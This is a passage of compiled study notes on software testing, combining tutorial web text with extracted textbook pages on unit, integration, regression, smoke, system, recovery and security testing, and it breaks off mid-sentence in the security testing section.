1,2 1,3 2,Stub 1 2,Stub 2 3,Stub 3 3,Stub 4 + Firstly, the integration between the modules 1,2 and 3 + Test the integration between the module 2 and stub 1,stub 2 + Test the integration between the module 3 and stub 3,stub 4

The replacement for the 'called' modules is known as 'Stubs' and is also used when the software needs to interact with an external system.

Advantages of Top-Down approach:

• The tested product is very consistent because the integration testing is basically performed in an environment that almost similar to that of reality

• Stubs can be written with lesser time because when compared to the drivers then Stubs are simpler to author.

• Fault Localization is easier. • Possibility to obtain an early prototype. • Critical Modules are tested on priority; major design flaws could be found and

fixed first.

Disadvantages of Top-Down approach:

• Basic functionality is tested at the end of cycle • Needs many Stubs. • Modules at lower level are tested inadequately.

3. Bottom-up integration testing: Testing takes place from the bottom of the control flow upwards. Components or systems are substituted by drivers. Below is the image of ‘Bottom up approach’:

Advantage of Bottom-Up approach:

• In this approach development and testing can be done together so that the product or application will be efficient and as per the customer specifications.

• Fault localization is easier. • No time is wasted waiting for all modules to be developed unlike Big-bang

approach

Disadvantages of Bottom-Up approach:

• We can catch the Key interface defects at the end of cycle • It is required to create the test drivers for modules at all levels except the top

control • Critical modules (at the top level of software architecture) which control the flow

of application are tested last and may be prone to defects. • Early prototype is not possible

4) Hybrid Approach: To overcome the limitations and to exploit the advantages of Top-down and Bottom-up approaches, a hybrid approach in testing is used. As the name suggests, it is a mixture of the two approaches like Top Down approach as well as Bottom Up approach. In this approach the system is viewed as three layers consisting of the main target layer in the middle, another layer above the target layer, and the last layer below the target layer.

The Top-Down approach is used in the topmost layer and Bottom-Up approach is used in the lowermost layer. The lowermost layer contains many general-purpose utility programs, which are helpful in verifying the correctness during the beginning of testing. Testing converges for the middle level target layers are selected on the basis of system characteristics and the structure of the code. The middle level target layer contains components using the utilities.

Final decision on selecting an integration approach depends on system characteristics as well as on customer expectations. Sometimes the customer wants to see a working version of the application as soon as possible thereby forcing an integration approach aimed at producing a basic working system in the earlier stages of the testing process.

Integration Testing Procedure

The integration test procedure irrespective of the test strategies (discussed above):

1. Prepare the Integration Test Plan 2. Design the Test Scenarios, Cases, and Scripts. 3. Executing the test Cases followed by reporting the defects. 4. Tracking & re-testing the defects. 5. Steps 3 and 4 are repeated until the completion of Integration is successfully.

Brief Description of Integration Test Plans:

It includes following attributes:

• Methods/Approaches to test (as discussed above). • Scopes and Out of Scopes Items of Integration Testing. • Roles and Responsibilities. • Pre-requisites for Integration testing. • Testing environment. • Risk and Mitigation Plans.

Entry and Exit Criteria.

Entry and Exit Criteria to Integration testing phase in any software development model

Entry Criteria:

• Unit Tested Components/Modules • All High prioritized bugs fixed and closed • All Modules to be code completed and integrated successfully. • Integration test Plan, test case, scenarios to be signed off and documented. • Required Test Environment to be set up for Integration testing

Exit Criteria:

• Successful Testing of Integrated Application. • Executed Test Cases are documented • All High prioritized bugs fixed and closed • Technical documents to be submitted followed by release Notes.

Best Practices/ Guidelines for Integration Testing

• First determine the Integration Test Strategy that could be adopted and later prepare the test cases and test data accordingly.

• Study the Architecture design of the Application and identify the Critical Modules. These need to be tested on priority.

• Obtain the interface designs from the Architectural team and create test cases to verify all of the interfaces in detail. Interface to database/external hardware/software application must be tested in detail.

• After the test cases, it's the test data which plays the critical role. • Always have the mock data prepared, prior to executing. Do not select test data

while executing the test cases.

How to write an Integration Test Case?

Simply put, a Test Case describes exactly how the test should be carried out. The Integration test cases specifically focus on the flow of data/information/control from one component to the other.

So the Integration Test cases should typically focus on scenarios where one component is being called from another. Also the overall application functionality should be tested to make sure the app works when the different components are brought together.

The various Integration Test Cases clubbed together form an Integration Test Suite Each suite may have a particular focus. In other words different Test Suites may be created to focus on different areas of the application.

As mentioned before a dedicated Testing Team may be created to execute the Integration test cases. Therefore the Integration Test Cases should be as detailed as possible.

17.3.1 Unit Testing

Unit testing focuses verification effort on the smallest unit of software design—the

software component or module. Using the component-level design description as a

2 Throughout this book, I use the terms conventional software or traditional software to refer to com-mon hierarchical or call-and-return software architectures that are frequently encountered in avariety of application domains. Traditional software architectures are not object-oriented and donot encompass WebApps.

pre75977_ch17.qxd 11/27/08 6:09 PM Page 456

guide, important control paths are tested to uncover errors within the boundary of

the module. The relative complexity of tests and the errors those tests uncover is lim-

ited by the constrained scope established for unit testing. The unit test focuses on the

internal processing logic and data structures within the boundaries of a component.

This type of testing can be conducted in parallel for multiple components.

Unit-test considerations. Unit tests are illustrated schematically in Figure 17.3.

The module interface is tested to ensure that information properly flows into and out

of the program unit under test. Local data structures are examined to ensure that

data stored temporarily maintains its integrity during all steps in an algorithm’s

execution. All independent paths through the control structure are exercised to ensure

that all statements in a module have been executed at least once. Boundary conditions

are tested to ensure that the module operates properly at boundaries established to

limit or restrict processing. And finally, all error-handling paths are tested.

Data flow across a component interface is tested before any other testing is initi-

ated. If data do not enter and exit properly, all other tests are moot. In addition, local

data structures should be exercised and the local impact on global data should be as-

certained (if possible) during unit testing.

Selective testing of execution paths is an essential task during the unit test. Test

cases should be designed to uncover errors due to erroneous computations, incor-

rect comparisons, or improper control flow.

Boundary testing is one of the most important unit testing tasks. Software often

fails at its boundaries. That is, errors often occur when the nth element of an

n-dimensional array is processed, when the ith repetition of a loop with i passes is

invoked, when the maximum or minimum allowable value is encountered. Test

cases that exercise data structure, control flow, and data values just below, at, and

just above maxima and minima are very likely to uncover errors.


Testcases

Module InterfaceLocal data structuresBoundary conditionsIndependent pathsError-handling paths

FIGURE 17.3

Unit test

It’s not a bad idea todesign unit test casesbefore you developcode for a component.It helps ensure thatyou’ll develop codethat will pass the tests.

What errorsare commonly

found during unittesting?

?

pre75977_ch17.qxd 11/27/08 6:09 PM Page 457

A good design anticipates error conditions and establishes error-handling paths

to reroute or cleanly terminate processing when an error does occur. Yourdon

[You75] calls this approach antibugging. Unfortunately, there is a tendency to incor-

porate error handling into software and then never test it. A true story may serve to

illustrate:

A computer-aided design system was developed under contract. In one transaction pro-

cessing module, a practical joker placed the following error handling message after a

series of conditional tests that invoked various control flow branches: ERROR! THERE IS

NO WAY YOU CAN GET HERE. This “error message” was uncovered by a customer during

user training!

Among the potential errors that should be tested when error handling is evalu-

ated are: (1) error description is unintelligible, (2) error noted does not correspond to

error encountered, (3) error condition causes system intervention prior to error han-

dling, (4) exception-condition processing is incorrect, or (5) error description does

not provide enough information to assist in the location of the cause of the error.

Unit-test procedures. Unit testing is normally considered as an adjunct to the

coding step. The design of unit tests can occur before coding begins or after source

code has been generated. A review of design information provides guidance for

establishing test cases that are likely to uncover errors in each of the categories dis-

cussed earlier. Each test case should be coupled with a set of expected results.

Because a component is not a stand-alone program, driver and/or stub software

must often be developed for each unit test. The unit test environment is illustrated in

Figure 17.4. In most applications a driver is nothing more than a “main program” that

accepts test case data, passes such data to the component (to be tested), and prints


WebRefUseful information on awide variety of articlesand resources for“agile testing” can befound at testing.com/agile/.

Be sure that youdesign tests to executeevery error-handlingpath. If you don’t, thepath may fail when itis invoked, exacer-bating an already diceysituation.

Testcases

InterfaceLocal data structuresBoundary conditionsIndependent pathsError-handling paths

Moduleto betested

Stub Stub

Driver

RESULTS

FIGURE 17.4

Unit-testenvironment

pre75977_ch17.qxd 11/27/08 6:09 PM Page 458

relevant results. Stubs serve to replace modules that are subordinate (invoked by) the

component to be tested. A stub or “dummy subprogram” uses the subordinate mod-

ule’s interface, may do minimal data manipulation, prints verification of entry, and

returns control to the module undergoing testing.

Drivers and stubs represent testing “overhead.” That is, both are software that

must be written (formal design is not commonly applied) but that is not delivered with

the final software product. If drivers and stubs are kept simple, actual overhead is rel-

atively low. Unfortunately, many components cannot be adequately unit tested with

“simple” overhead software. In such cases, complete testing can be postponed until

the integration test step (where drivers or stubs are also used).

Unit testing is simplified when a component with high cohesion is designed.

When only one function is addressed by a component, the number of test cases is

reduced and errors can be more easily predicted and uncovered.

17.3.2 Integration Testing

A neophyte in the software world might ask a seemingly legitimate question once all

modules have been unit tested: “If they all work individually, why do you doubt that

they’ll work when we put them together?” The problem, of course, is “putting them

together”—interfacing. Data can be lost across an interface; one component can

have an inadvertent, adverse effect on another; subfunctions, when combined, may

not produce the desired major function; individually acceptable imprecision may be

magnified to unacceptable levels; global data structures can present problems.

Sadly, the list goes on and on.

Integration testing is a systematic technique for constructing the software archi-

tecture while at the same time conducting tests to uncover errors associated with

interfacing. The objective is to take unit-tested components and build a program

structure that has been dictated by design.

There is often a tendency to attempt nonincremental integration; that is, to con-

struct the program using a “big bang” approach. All components are combined in

advance. The entire program is tested as a whole. And chaos usually results! A set

of errors is encountered. Correction is difficult because isolation of causes is com-

plicated by the vast expanse of the entire program. Once these errors are corrected,

new ones appear and the process continues in a seemingly endless loop.

Incremental integration is the antithesis of the big bang approach. The program

is constructed and tested in small increments, where errors are easier to isolate and

correct; interfaces are more likely to be tested completely; and a systematic test

approach may be applied. In the paragraphs that follow, a number of different incre-

mental integration strategies are discussed.

Top-down integration. Top-down integration testing is an incremental approach

to construction of the software architecture. Modules are integrated by moving

downward through the control hierarchy, beginning with the main control module


There are some situa-tions in which you willnot have the resourcesto do comprehensiveunit testing. Selectcritical or complexmodules and unit testonly those.

Taking the “big bang”approach to integrationis a lazy strategy thatis doomed to failure.Integrate incremen-tally, testing as you go.

When you develop aproject schedule, you’llhave to consider themanner in which inte-gration will occur sothat components willbe available whenneeded.

pre75977_ch17.qxd 11/27/08 6:09 PM Page 459

(main program). Modules subordinate (and ultimately subordinate) to the main con-

trol module are incorporated into the structure in either a depth-first or breadth-first

manner.

Referring to Figure 17.5, depth-first integration integrates all components on a

major control path of the program structure. Selection of a major path is somewhat

arbitrary and depends on application-specific characteristics. For example, selecting

the left-hand path, components M1, M2 , M5 would be integrated first. Next, M8 or (if

necessary for proper functioning of M2) M6 would be integrated. Then, the central

and right-hand control paths are built. Breadth-first integration incorporates all com-

ponents directly subordinate at each level, moving across the structure horizontally.

From the figure, components M2, M3, and M4 would be integrated first. The next con-

trol level, M5, M6, and so on, follows. The integration process is performed in a series

of five steps:

1. The main control module is used as a test driver and stubs are substituted for

all components directly subordinate to the main control module.

2. Depending on the integration approach selected (i.e., depth or breadth first),

subordinate stubs are replaced one at a time with actual components.

3. Tests are conducted as each component is integrated.

4. On completion of each set of tests, another stub is replaced with the real

component.

5. Regression testing (discussed later in this section) may be conducted to

ensure that new errors have not been introduced.

The process continues from step 2 until the entire program structure is built.


What are thesteps for

top-downintegration?

?

M1

M3M2

M7M6M5

M8

M4

FIGURE 17.5

Top-downintegration

pre75977_ch17.qxd 11/27/08 6:09 PM Page 460

The top-down integration strategy verifies major control or decision points early

in the test process. In a “well-factored” program structure, decision making occurs

at upper levels in the hierarchy and is therefore encountered first. If major control

problems do exist, early recognition is essential. If depth-first integration is selected,

a complete function of the software may be implemented and demonstrated. Early

demonstration of functional capability is a confidence builder for all stakeholders.

Top-down strategy sounds relatively uncomplicated, but in practice, logistical

problems can arise. The most common of these problems occurs when processing

at low levels in the hierarchy is required to adequately test upper levels. Stubs

replace low-level modules at the beginning of top-down testing; therefore, no sig-

nificant data can flow upward in the program structure. As a tester, you are left with

three choices: (1) delay many tests until stubs are replaced with actual modules,

(2) develop stubs that perform limited functions that simulate the actual module, or

(3) integrate the software from the bottom of the hierarchy upward.

The first approach (delay tests until stubs are replaced by actual modules) can

cause you to lose some control over correspondence between specific tests and

incorporation of specific modules. This can lead to difficulty in determining the cause

of errors and tends to violate the highly constrained nature of the top-down

approach. The second approach is workable but can lead to significant overhead, as

stubs become more and more complex. The third approach, called bottom-up inte-

gration is discussed in the paragraphs that follow.

Bottom-up integration. Bottom-up integration testing, as its name implies, begins

construction and testing with atomic modules (i.e., components at the lowest levels

in the program structure). Because components are integrated from the bottom up,

the functionality provided by components subordinate to a given level is always

available and the need for stubs is eliminated. A bottom-up integration strategy may

be implemented with the following steps:

1. Low-level components are combined into clusters (sometimes called builds)

that perform a specific software subfunction.

2. A driver (a control program for testing) is written to coordinate test case input

and output.

3. The cluster is tested.

4. Drivers are removed and clusters are combined moving upward in the

program structure.

Integration follows the pattern illustrated in Figure 17.6. Components are com-

bined to form clusters 1, 2, and 3. Each of the clusters is tested using a driver (shown

as a dashed block). Components in clusters 1 and 2 are subordinate to Ma. Drivers D1

and D2 are removed and the clusters are interfaced directly to Ma. Similarly, driver D3

for cluster 3 is removed prior to integration with module Mb. Both Ma and Mb will

ultimately be integrated with component Mc, and so forth.


Whatproblems

may beencounteredwhen top-downintegration ischosen?

?

What are thesteps for

bottom-upintegration?

?

Bottom-up integrationeliminates the need forcomplex stubs.

pre75977_ch17.qxd 11/27/08 6:09 PM Page 461

As integration moves upward, the need for separate test drivers lessens. In fact,

if the top two levels of program structure are integrated top down, the number of

drivers can be reduced substantially and integration of clusters is greatly simplified.

Regression testing. Each time a new module is added as part of integration test-

ing, the software changes. New data flow paths are established, new I/O may occur,

and new control logic is invoked. These changes may cause problems with functions

that previously worked flawlessly. In the context of an integration test strategy,

regression testing is the reexecution of some subset of tests that have already been

conducted to ensure that changes have not propagated unintended side effects.

In a broader context, successful tests (of any kind) result in the discovery of errors,

and errors must be corrected. Whenever software is corrected, some aspect of the

software configuration (the program, its documentation, or the data that support it)

is changed. Regression testing helps to ensure that changes (due to testing or for

other reasons) do not introduce unintended behavior or additional errors.

Regression testing may be conducted manually, by reexecuting a subset of all test

cases or using automated capture/playback tools. Capture/playback tools enable the

software engineer to capture test cases and results for subsequent playback and

comparison. The regression test suite (the subset of tests to be executed) contains

three different classes of test cases:

• A representative sample of tests that will exercise all software functions.

• Additional tests that focus on software functions that are likely to be affected

by the change.

• Tests that focus on the software components that have been changed.


Mc

Ma

D2 D3D1

Mb

Cluster 1

Cluster 3

Cluster 2

FIGURE 17.6

Bottom-upintegration

Regression testing isan important strategyfor reducing “sideeffects.” Run regres-sion tests every timea major change ismade to the software(including theintegration of newcomponents).

pre75977_ch17.qxd 11/27/08 6:09 PM Page 462

As integration testing proceeds, the number of regression tests can grow quite

large. Therefore, the regression test suite should be designed to include only those

tests that address one or more classes of errors in each of the major program func-

tions. It is impractical and inefficient to reexecute every test for every program func-

tion once a change has occurred.

Smoke testing. Smoke testing is an integration testing approach that is com-

monly used when product software is developed. It is designed as a pacing mecha-

nism for time-critical projects, allowing the software team to assess the project on

a frequent basis. In essence, the smoke-testing approach encompasses the follow-

ing activities:

1. Software components that have been translated into code are integrated into

a build. A build includes all data files, libraries, reusable modules, and engi-

neered components that are required to implement one or more product

functions.

2. A series of tests is designed to expose errors that will keep the build from

properly performing its function. The intent should be to uncover “show-

stopper” errors that have the highest likelihood of throwing the software

project behind schedule.

3. The build is integrated with other builds, and the entire product (in its current

form) is smoke tested daily. The integration approach may be top down or

bottom up.

The daily frequency of testing the entire product may surprise some readers. How-

ever, frequent tests give both managers and practitioners a realistic assessment of

integration testing progress. McConnell [McC96] describes the smoke test in the

following manner:

The smoke test should exercise the entire system from end to end. It does not have to be

exhaustive, but it should be capable of exposing major problems. The smoke test should

be thorough enough that if the build passes, you can assume that it is stable enough to

be tested more thoroughly.

Smoke testing provides a number of benefits when it is applied on complex, time-

critical software projects:

• Integration risk is minimized. Because smoke tests are conducted daily,

incompatibilities and other show-stopper errors are uncovered early, thereby

reducing the likelihood of serious schedule impact when errors are

uncovered.

• The quality of the end product is improved. Because the approach is construc-

tion (integration) oriented, smoke testing is likely to uncover functional

errors as well as architectural and component-level design errors. If these

errors are corrected early, better product quality will result.


Smoke testing mightbe characterized as arolling integrationstrategy. The softwareis rebuilt (with newcomponents added)and smoke testedevery day.

uote:

“Treat the dailybuild as theheartbeat of theproject. If there’sno heartbeat, theproject is dead.”

Jim McCarthy

Whatbenefits can

be derived fromsmoke testing?

?

pre75977_ch17.qxd 11/27/08 6:09 PM Page 463

• Error diagnosis and correction are simplified. Like all integration testing

approaches, errors uncovered during smoke testing are likely to be associ-

ated with “new software increments”—that is, the software that has just been

added to the build(s) is a probable cause of a newly discovered error.

• Progress is easier to assess. With each passing day, more of the software has

been integrated and more has been demonstrated to work. This improves team

morale and gives managers a good indication that progress is being made.

Strategic options. There has been much discussion (e.g., [Bei84]) about the rela-

tive advantages and disadvantages of top-down versus bottom-up integration test-

ing. In general, the advantages of one strategy tend to result in disadvantages for the

other strategy. The major disadvantage of the top-down approach is the need for

stubs and the attendant testing difficulties that can be associated with them. Prob-

lems associated with stubs may be offset by the advantage of testing major control

functions early. The major disadvantage of bottom-up integration is that “the pro-

gram as an entity does not exist until the last module is added” [Mye79]. This draw-

back is tempered by easier test case design and a lack of stubs.

Selection of an integration strategy depends upon software characteristics and,

sometimes, project schedule. In general, a combined approach (sometimes called

sandwich testing) that uses top-down tests for upper levels of the program structure,

coupled with bottom-up tests for subordinate levels may be the best compromise.

As integration testing is conducted, the tester should identify critical modules. A

critical module has one or more of the following characteristics: (1) addresses several

software requirements, (2) has a high level of control (resides relatively high in the

program structure), (3) is complex or error prone, or (4) has definite performance

requirements. Critical modules should be tested as early as is possible. In addition,

regression tests should focus on critical module function.

Integration test work products. An overall plan for integration of the software

and a description of specific tests is documented in a Test Specification. This work prod-

uct incorporates a test plan and a test procedure and becomes part of the software

configuration. Testing is divided into phases and builds that address specific func-

tional and behavioral characteristics of the software. For example, integration testing

for the SafeHome security system might be divided into the following test phases:

• User interaction (command input and output, display representation, error

processing and representation)

• Sensor processing (acquisition of sensor output, determination of sensor

conditions, actions required as a consequence of conditions)

• Communications functions (ability to communicate with central monitoring

station)

• Alarm processing (tests of software actions that occur when an alarm is

encountered)


WebRefPointers to commentaryon testing strategiescan be found atwww.qalinks.com.

What is a“critical

module” andwhy should weidentify it?

?

pre75977_ch17.qxd 11/27/08 6:09 PM Page 464

http://www.qalinks.com

Each of these integration test phases delineates a broad functional category

within the software and generally can be related to a specific domain within the soft-

ware architecture. Therefore, program builds (groups of modules) are created to cor-

respond to each phase. The following criteria and corresponding tests are applied for

all test phases:

Interface integrity. Internal and external interfaces are tested as each module

(or cluster) is incorporated into the structure.

Functional validity. Tests designed to uncover functional errors are conducted.

Information content. Tests designed to uncover errors associated with local or

global data structures are conducted.

Performance. Tests designed to verify performance bounds established during

software design are conducted.

A schedule for integration, the development of overhead software, and related

topics are also discussed as part of the test plan. Start and end dates for each phase

are established and “availability windows” for unit-tested modules are defined. A

brief description of overhead software (stubs and drivers) concentrates on charac-

teristics that might require special effort. Finally, test environment and resources are

described. Unusual hardware configurations, exotic simulators, and special test

tools or techniques are a few of many topics that may also be discussed.

The detailed testing procedure that is required to accomplish the test plan is

described next. The order of integration and corresponding tests at each integration

step are described. A listing of all test cases (annotated for subsequent reference)

and expected results are also included.

A history of actual test results, problems, or peculiarities is recorded in a Test

Report that can be appended to the Test Specification, if desired. Information con-

tained in this section can be vital during software maintenance. Appropriate refer-

ences and appendixes are also presented.

Like all other elements of a software configuration, the test specification format

may be tailored to the local needs of a software engineering organization. It is impor-

tant to note, however, that an integration strategy (contained in a test plan) and test-

ing details (described in a test procedure) are essential ingredients and must appear.


What criteriashould be

used to designintegration tests?

?

pre75977_ch17.qxd 11/27/08 6:09 PM Page 465

system testing

DEFINITION

System Testing is a level of the software testing process where a complete, integrated system/software is tested.

The purpose of this test is to evaluate the system’s compliance with the specified requirements.

• In system testing the behavior of whole system/product is tested as defined by the scope of the development project or product.

• It may include tests based on risks and/or requirement specifications, business process, use cases, or other high level descriptions of system behavior, interactions with the operating systems, and system resources.

• System testing is most often the final test to verify that the system to be delivered meets the specification and its purpose.

• System testing is carried out by specialists testers or independent testers. • System testing should investigate both functional and non-functional

requirements of the testing.

METHOD

Usually, Black Box Testing method is used.

When is it performed?

System Testing is performed after Integration Testing and before Acceptance Testing.

Who performs it?

Normally, independent Testers perform System Testing.

Definition by ISTQB

• system testing: The process of testing an integrated system to verify that it meets specified requirements.

This is black box type of testing where external working of the software is evaluated with the help of requirement documents & it is totally based on Users point of view. For this type of testing do not required knowledge of internal design or structure or code. This testing is to be carried out only after System Integration Testing is completed where both Functional & Non-Functional requirements are verified.

In the integration testing testers are concentrated on finding bugs/defects on integrated modules. But in the Software System Testing testers are concentrated on finding bugs/defects based on software application behavior, software design and expectation of end user.

Why system testing is important:

a) In Software Development Life Cycle the System Testing is perform as the first level of testing where the System is tested as a whole.

http://softwaretestingfundamentals.com/black-box-testing/

http://softwaretestingfundamentals.com/integration-testing/

http://softwaretestingfundamentals.com/acceptance-testing/

http://www.softwaretestingclass.com/

b) In this step of testing check if system meets functional requirement or not.

c) System Testing enables you to test, validate and verify both the Application Architecture and Business requirements.

d) The application/System is tested in an environment that particularly resembles the effective production environment where the application/software will be lastly deployed.

Generally, a separate and dedicated team is responsible for system testing. And, System Testing is performed on staging server which is similar to production server. So this means you are testing software application as good as production environment.

#1. It is very important to complete a full test cycle and system testing is the stage where it is done.

#2. System testing is performed in environment which is similar to the production environment and hence stakeholders can get a good idea of the user’s reaction.

#3. It helps to minimize after-deployment troubleshooting and support calls.

#4. In this STLC stage Application Architecture and Business requirements both are tested.

Different Hierarchical levels of testing:

As with almost any technical process, software testing has a prescribed order in which things should be done. Different levels of testing are used in the testing process; each level of testing aims to test different aspects of the system. The following is lists of software testing categories arranged in sequentially organize.

http://www.softwaretestingclass.com/wp-content/uploads/2012/09/levels-of-testing.jpg

Focus criteria for System Testing:

System testing mainly focuses on following:

1. External interfaces 2. Multiprogram and complex functionalities 3. Security 4. Recovery 5. Performance 6. Operator and user’s smooth interaction with system 7. Installability 8. Documentation 9. Usability 10. Load / Stress

Entry Criteria for System Testing:

• Unit Testing should be finished. • Integration of modules should be fully integrated. • As per the specification document software development is completed. • Testing environment is available for testing (similar to Staging environment)

How to do System Testing?

The following steps are important to perform System Testing: ……..Step 1: Create a System Test Plan ……..Step 2: Create Test Cases ……..Step 3: Carefully Build Data used as Input for System Testing ……..Step 3: If applicable create scripts to ………………- Build environment and ………………- to automate Execution of test cases ……..Step 4: Execute the test cases ……..Step 5: Fix the bugs if any and re test the code ……..Step 6: Repeat the test cycle as necessary

In Software System Testing following steps needs to be executed:

Step 1) First & important step is preparation of System Test Plan:

The what all points to be cover in System Test plan may vary from organization to organization as well as based on project plan, test strategy & main test plan.

Nevertheless, here is list of standard point to be considered while creating System Test Plan:

• Goals & Objective

• Scope • Critical areas Area to focus • Test Deliverable • Testing Strategy for System testing • Testing Schedule • Entry and exit criteria • Suspension & resumption criteria for system testing • Test Environment • Roles and Responsibilities • Glossary

Step 2) Second step is to creation Test Cases:

It is very much similar functional test case writing. In test case writing you should write the test scenarios & use cases.

Here you should consider different type of testing like Functional testing, Regression testing, Smoke testing, Sanity testing, Ad-hoc testing, Exploratory testing, Usability testing, GUI software testing, Compatibility testing, Performance testing, Load testing, Stress testing, Volume testing, Error handling testing, Scalability testing, Security testing, Capacity testing, Installation testing, Recovery testing, Reliability testing, Accessibility testing etc

While writing test case you need to check that test cases are covering all functional, non-functional, technical & UI requirements or not.

Sample Test Case Format:

Step 3) Creation of test data which used for System testing.

Step 4) Automated test case execution.

Step 5) Execution of normal test case & update test case if using any test management tool (if any).

Step 6) Bug Reporting, Bug verification & Regression testing.

Step 7) Repeat testing life cycle (if required).

What is a ‘System Test Plan’?

As you may have read in the other articles in the testing series, this document typically describes the following: ………- The Testing Goals ………- The key areas to be focused on while testing ………- The Testing Deliverables ………- How the tests will be carried out ………- The list of things to be Tested ………- Roles and Responsibilities ………- Prerequisites to begin Testing ………- Test Environment ………- Assumptions ………- What to do after a test is successfully carried out ………- What to do if test fails ………- Glossary

Types of System Testing:

System Testing is called a super set of all types of testing as all the major types of testing are covered in System Testing. Although focus on types of testing may vary on the basis of product, organization processes, timeline and requirements.

Installation Testing: To make sure that product / software can be installed on specific or support defined system, can be configured and can be brought into an operational mode.

Functionality Testing: To make sure that functionality of product are working as per the requirements defined, within the capabilities of the system,

http://www.softwaretestinghelp.com/software-installationuninstallation-testing/

Recoverability Testing: To make sure how well the system recovers from various input errors and other failure situations.

Interoperability Testing: To make sure whether the system can operate well with third party products or not.

Performance Testing: To make sure system’s performance under various condition, in terms of performance characteristics.

Scalability Testing: To make sure system’s scaling abilities in various terms like user scaling, geographic scaling and resource scaling.

Reliability Testing: To make sure system can be operated for longer duration without developing failures.

Regression Testing: To make sure system’s stability as it passes through integration of different sub systems and maintenance tasks.

Documentation Testing: To make sure that system’s user guide and other help topics documents are correct and usable.

Security Testing: To make sure that system does not allow unauthorized access to data and resources.

Usability Testing: To make sure that system is easy to use, learn and operate.

Example Test Scenarios

System testing sample test scenarios for an eCommerce Site:

1. If the site launches properly with all the relevant pages, features and logo

2. If the user can register/login to the site

3. If the user can see products available, can add products to his cart can do payment and can get confirmation via e-mail or SMS or call.

4. If the major functionality like searching, filtering, sorting, adding, changing, wish list etc work as expected

4. If number of users (defined as in requirement document) can access the site simultaneously

5. If the site launches properly in all major browsers and their latest versions

http://www.softwaretestinghelp.com/introduction-to-performance-testing-loadrunner-training-tutorial-part-1/

http://www.softwaretestinghelp.com/test-documentation-reviews/

http://www.softwaretestinghelp.com/category/security-testing/

http://www.softwaretestinghelp.com/usability-testing-guide/

6. If the transactions are being done on the site via specific user are secure enough

7. If the site launches properly on all the supported platforms like Windows, Linux, Mobile etc.

8. If the user manual/guide return policy, privacy policy and terms of using the site is available as a separate document and useful to any newbie or first time user.

9. If the content of pages are properly aligned, well managed and without spelling mistakes.

10. If session timeout is implemented and working as expected

11. If user is satisfied after using the site or in other words user does not find it difficult to use the site.

How to perform System Testing?

System testing is basically a part of software testing and test plan should always contain specific space for this testing.

To test the system as a whole, requirements and expectations should be clear and the tester needs to understand real time usage of application too.

Also, most used third party tools, version of OSes, flavors and architecture of OSes can affect system’s functionality, performance, security, recoverability or installability.

Therefore, while testing system a clear picture about how the application is going to be used and what kind of issues it can face in real time can be helpful. In addition to that, requirements document is as important as understanding the application.

Clear and updated requirements document can save tester from number of misunderstandings, assumptions and questions.

In short, a pointed and crisp requirement document with latest updates along with understanding of real time application usage can make system testing more fruitful.

What do you verify in System Testing ?

System testing involves testing the software code for following

• Testing the fully integrated applications including external peripherals in order to check how components interact with one another and with the system as a whole. This is also called End to End scenario testing..

• Verify thorough testing of every input in the application to check for desired outputs.

• Testing of the user's experience with the application. .

What Types of System Testing Should Testers Use?

Working towards Effective Systems Testing:

There are various factors that affect success of System Testing:

1) Test Coverage: System Testing will be effective only to the extent of the coverage of Test Cases. What is Test coverage? Adequate Test coverage implies the scenarios covered by the test cases are sufficient. The Test cases should “cover” all scenarios, use cases, Business Requirements, Technical Requirements, and Performance Requirements. The test cases should enable us to verify and validate that the system/application meets the project goals and specifications.

2) Defect Tracking: The defects found during the process of testing should be tracked. Subsequent iterations of test cases verify if the defects have been fixed.

3) Test Execution: The Test cases should be executed in the manner specified. Failure to do so results in improper Test Results.

4) Build Process Automation: A Lot of errors occur due to an improper build. ‘Build’ is a compilation of the various components that make the application deployed in the appropriate environment. The Test results will not be accurate if the application is not ‘built’ correctly or if the environment is not set up as specified. Automating this process may help reduce manual errors.

5) Test Automation: Automating the Test process could help us in many ways:

a. The test can be repeated with fewer errors of omission or oversight

b. Some scenarios can be simulated if the tests are automated for instance simulating a large number of users or simulating increasing large amounts of input/output data

6) Documentation: Proper Documentation helps keep track of Tests executed. It also helps create a knowledge base for current and future projects. Appropriate metrics/Statistics can be captured to validate or verify the efficiency of the technical design /architecture.

17.7 SYSTEM TESTING

At the beginning of this book, I stressed the fact that software is only one element of

a larger computer-based system. Ultimately, software is incorporated with other sys-

tem elements (e.g., hardware, people, information), and a series of system integra-

tion and validation tests are conducted. These tests fall outside the scope of the

software process and are not conducted solely by software engineers. However,

steps taken during software design and testing can greatly improve the probability

of successful software integration in the larger system.

A classic system-testing problem is “finger pointing.” This occurs when an error

is uncovered, and the developers of different system elements blame each other for

the problem. Rather than indulging in such nonsense, you should anticipate poten-

tial interfacing problems and (1) design error-handling paths that test all information

coming from other elements of the system, (2) conduct a series of tests that simulate

bad data or other potential errors at the software interface, (3) record the results of

tests to use as “evidence” if finger pointing does occur, and (4) participate in plan-

ning and design of system tests to ensure that software is adequately tested.

System testing is actually a series of different tests whose primary purpose is to

fully exercise the computer-based system. Although each test has a different pur-

pose, all work to verify that system elements have been properly integrated and per-

form allocated functions. In the sections that follow, I discuss the types of system

tests that are worthwhile for software-based systems.

17.7.1 Recovery Testing

Many computer-based systems must recover from faults and resume processing

with little or no downtime. In some cases, a system must be fault tolerant; that is,

processing faults must not cause overall system function to cease. In other cases, a

system failure must be corrected within a specified period of time or severe eco-

nomic damage will occur.

Recovery testing is a system test that forces the software to fail in a variety of ways

and verifies that recovery is properly performed. If recovery is automatic (performed

by the system itself), reinitialization, checkpointing mechanisms, data recovery, and

restart are evaluated for correctness. If recovery requires human intervention, the

mean-time-to-repair (MTTR) is evaluated to determine whether it is within accept-

able limits.

17.7.2 Security Testing

Any computer-based system that manages sensitive information or causes actions

that can improperly harm (or benefit) individuals is a target for improper or illegal

penetration. Penetration spans a broad range of activities: hackers who attempt to

penetrate systems for sport, disgruntled employees who attempt to penetrate for

revenge, dishonest individuals who attempt to penetrate for illicit personal gain.


uote:

“Like death andtaxes, testing isboth unpleasantand inevitable.”

Ed Yourdon

pre75977_ch17.qxd 11/27/08 6:09 PM Page 470

Security testing attempts to verify that protection mechanisms built into a system

will, in fact, protect it from improper penetration. To quote Beizer [Bei84]: “The sys-

tem’s security must, of course, be tested for invulnerability from frontal attack—but

must also be tested for invulnerability from flank or rear attack.”

During security testing, the tester plays the role(s) of the individual who desires to

penetrate the system. Anything goes! The tester may attempt to acquire passwords

through external clerical means; may attack the system with custom software

designed to break down any defenses that have been constructed; may overwhelm

the system, thereby denying service to others; may purposely cause system errors,

hoping to penetrate during recovery; may browse through insecure data, hoping to

find the key to system entry.

Given enough time and resources, good security testing will ultimately penetrate

